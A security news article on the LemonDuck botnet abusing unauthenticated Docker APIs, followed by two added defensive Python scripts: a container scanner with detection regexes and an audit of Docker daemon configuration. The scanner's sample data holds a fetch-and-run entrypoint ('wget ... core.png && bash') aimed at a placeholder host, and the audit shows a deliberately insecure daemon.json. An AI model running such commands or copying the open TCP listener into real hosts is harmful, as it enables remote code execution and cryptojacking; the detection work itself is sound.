A recent report from CrowdStrike has revealed that the LemonDuck cryptocurrency mining botnet is now targeting misconfigured Docker APIs. LemonDuck, previously known for exploiting Microsoft Exchange Server vulnerabilities and for using a range of exploits for crypto-mining, privilege escalation, and lateral movement inside compromised networks, has added exposed Docker APIs to its initial-access repertoire.
According to CrowdStrike, LemonDuck gains initial access through Docker APIs that are reachable over the network without authentication; such an endpoint lets anyone who can connect to it create and start containers on the host. The botnet starts a container with a custom Docker entrypoint that downloads a Bash script disguised as an image file, ‘core.png’, which in turn fetches the actual payload, an ‘a.asp’ file, and launches the miner. Before mining begins, a.asp terminates competing processes, deletes files that would serve as indicators of compromise, and cuts network connections belonging to rival crypto-mining groups. It can also disable Alibaba Cloud’s monitoring service, helping LemonDuck avoid detection by defenders.
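To hunt for this pattern in an existing environment, the check below (an added example, not CrowdStrike’s analysis or LemonDuck’s code) walks `docker inspect`-style container records and flags the traits described above: an entrypoint that chains a download into a shell, a shell executing a file with an image or `.asp` extension, and, as general escalation signs rather than anything the report attributes to LemonDuck, privileged mode and host filesystem mounts. The records, image names, URL (a TEST-NET address) and paths are constructed for the example; in practice the input would be the JSON from `docker inspect $(docker ps -q)`.

```python
"""Flag container definitions that resemble the Docker-API abuse described above.

Added example; not code from the article, from CrowdStrike or from LemonDuck.
The records below are constructed to look like `docker inspect` output, limited
to the fields this check reads. Image names, URL and paths are placeholders.
"""
import re
from typing import Dict, List

# curl/wget whose output or downloaded file is handed to a shell via |, && or ;
DOWNLOAD_TO_SHELL = re.compile(
    r"\b(curl|wget)\b.*?(\|\s*|&&\s*|;\s*)(ba)?sh\b", re.IGNORECASE
)
# a shell running a file whose extension claims it is an image or a web page
DISGUISED_SCRIPT = re.compile(
    r"\b(ba)?sh\s+\S+\.(png|jpg|jpeg|gif|asp)\b", re.IGNORECASE
)
# host paths that give a container the host's credentials, including ~/.ssh
SENSITIVE_HOST_PATHS = ("/", "/root", "/home", "/etc")


def command_string(record: Dict) -> str:
    """Join Entrypoint and Cmd the way the container would actually run them."""
    cfg = record.get("Config") or {}
    return " ".join((cfg.get("Entrypoint") or []) + (cfg.get("Cmd") or []))


def suspicious_findings(record: Dict) -> List[str]:
    """Return human-readable findings for one container record (empty if clean)."""
    findings = []
    cmd = command_string(record)
    if DOWNLOAD_TO_SHELL.search(cmd):
        findings.append(f"entrypoint chains a download into a shell: {cmd!r}")
    if DISGUISED_SCRIPT.search(cmd):
        findings.append(f"shell executes a file with a non-script extension: {cmd!r}")
    host_cfg = record.get("HostConfig") or {}
    if host_cfg.get("Privileged"):
        findings.append("container runs privileged")
    for bind in host_cfg.get("Binds") or []:
        src = bind.split(":", 1)[0]
        if src in SENSITIVE_HOST_PATHS or src.startswith(("/root/", "/home/")):
            findings.append(f"sensitive host path mounted: {bind}")
    return findings


def scan(records: List[Dict]) -> Dict[str, List[str]]:
    """Map container Id -> findings for every record."""
    return {r["Id"]: suspicious_findings(r) for r in records}


# Constructed sample records: one mimics the staged download/execute described
# in the article (placeholder URL on TEST-NET-2), the other is an ordinary web server.
SAMPLE_CONTAINERS = [
    {
        "Id": "c0ffee01",
        "Config": {
            "Image": "alpine:latest",
            "Entrypoint": ["/bin/sh", "-c"],
            "Cmd": ["wget -q -O /tmp/core.png http://198.51.100.7/core.png && bash /tmp/core.png"],
        },
        "HostConfig": {"Privileged": False, "Binds": ["/:/mnt/host"]},
    },
    {
        "Id": "c0ffee02",
        "Config": {
            "Image": "nginx:1.25",
            "Entrypoint": ["/docker-entrypoint.sh"],
            "Cmd": ["nginx", "-g", "daemon off;"],
        },
        "HostConfig": {"Privileged": False, "Binds": ["/srv/www:/usr/share/nginx/html:ro"]},
    },
]

if __name__ == "__main__":
    for cid, findings in scan(SAMPLE_CONTAINERS).items():
        print(f"{cid}: {'SUSPICIOUS' if findings else 'ok'}")
        for f in findings:
            print(f"  - {f}")
```

The regexes are deliberately narrow heuristics: a legitimate entrypoint rarely pipes `curl` into `bash` or runs a `.png` with a shell, so a hit is worth a look, but absence of a hit proves nothing, since the staged script can rename itself or be fetched by the payload rather than the entrypoint.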
For lateral movement, LemonDuck searches the filesystem for SSH keys and uses them to log in to additional servers and run its scripts there. CrowdStrike’s researchers have identified multiple campaigns originating from LemonDuck’s command-and-control (C&C) servers, targeting both Windows and Linux systems.
The surge in cryptocurrency values in recent years, coupled with the widespread adoption of cloud and container technologies in enterprises, has made crypto-mining a lucrative option for threat actors. As a result, botnets like LemonDuck have shifted their focus to target Docker for crypto-mining on the Linux platform.
This development underscores the importance of configuring container environments in line with established best practices: the Docker daemon API should never be reachable over the network without TLS client-certificate authentication (a `tcp://` listener without `--tlsverify` is unauthenticated), and ideally stays on its local Unix socket with access limited to trusted users. Beyond that, cloud workload security solutions and detection and response tools help raise the security posture of containerized environments and reduce the risk of crypto-mining attacks.
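As a concrete version of that configuration check, the script below (added here, not from the article) audits a Docker daemon configuration for the weakness LemonDuck exploits, a TCP API listener without TLS client-certificate verification, and shows a weak `daemon.json` next to a hardened one. The two configurations, the address 10.0.0.5 and the certificate paths are constructed for the example; the keys `hosts`, `tlsverify`, `tlscacert`, `tlscert` and `tlskey` and the `-H`/`--host` and `--tlsverify` flags are real dockerd options.

```python
"""Audit a Docker daemon configuration for an unauthenticated TCP API listener.

Added example, not part of the original article. It reads the `hosts` and TLS
keys dockerd accepts in /etc/docker/daemon.json and the equivalent command-line
flags. Both configurations below are constructed for the example.
"""
import json
import shlex
from typing import Dict, List
from urllib.parse import urlparse

# Weak: the API listens on every interface, port 2375, with no TLS and no client
# authentication. Anyone who can reach the port can run containers as root.
WEAK_DAEMON_JSON = json.loads("""
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://0.0.0.0:2375"]
}
""")

# Hardened: bound to one management address, TLS required, and clients must
# present a certificate signed by the CA in tlscacert. Paths/address are placeholders.
HARDENED_DAEMON_JSON = json.loads("""
{
  "hosts": ["unix:///var/run/docker.sock", "tcp://10.0.0.5:2376"],
  "tlsverify": true,
  "tlscacert": "/etc/docker/ca.pem",
  "tlscert": "/etc/docker/server-cert.pem",
  "tlskey": "/etc/docker/server-key.pem"
}
""")


def hosts_from_argv(argv: str) -> List[str]:
    """Collect -H / --host values from a dockerd command line."""
    tokens = shlex.split(argv)
    hosts = []
    for i, tok in enumerate(tokens):
        if tok in ("-H", "--host") and i + 1 < len(tokens):
            hosts.append(tokens[i + 1])
        elif tok.startswith("--host="):
            hosts.append(tok.split("=", 1)[1])
    return hosts


def audit_daemon(config: Dict, argv: str = "") -> List[str]:
    """Return findings for the listeners in daemon.json plus the command line."""
    tokens = shlex.split(argv)
    hosts = list(config.get("hosts") or []) + hosts_from_argv(argv)
    # `tls: true` alone only encrypts; only `tlsverify` authenticates the client.
    tlsverify = bool(config.get("tlsverify")) or any(
        t in ("--tlsverify", "--tlsverify=true") for t in tokens
    )
    findings = []
    for host in hosts:
        url = urlparse(host)
        if url.scheme != "tcp":
            continue  # unix:// and fd:// are local and governed by file permissions
        if not tlsverify:
            findings.append(
                f"{host}: TCP API without client certificate verification (unauthenticated)"
            )
        elif url.hostname in ("0.0.0.0", "::", None):
            findings.append(
                f"{host}: TLS-protected but bound to all interfaces; restrict reachability"
            )
    return findings


if __name__ == "__main__":
    for name, cfg in (("weak", WEAK_DAEMON_JSON), ("hardened", HARDENED_DAEMON_JSON)):
        print(f"{name}: {audit_daemon(cfg) or 'no findings'}")
    print(audit_daemon({}, "dockerd -H unix:///var/run/docker.sock -H tcp://0.0.0.0:2375"))
```

Run it against the live host by loading `/etc/docker/daemon.json` and the `ExecStart` line of the dockerd unit; if both define `hosts`, dockerd itself refuses to start, so in practice only one source is populated. Even the hardened form should additionally be firewalled to the management network, since a client certificate protects the API but not against a leaked key.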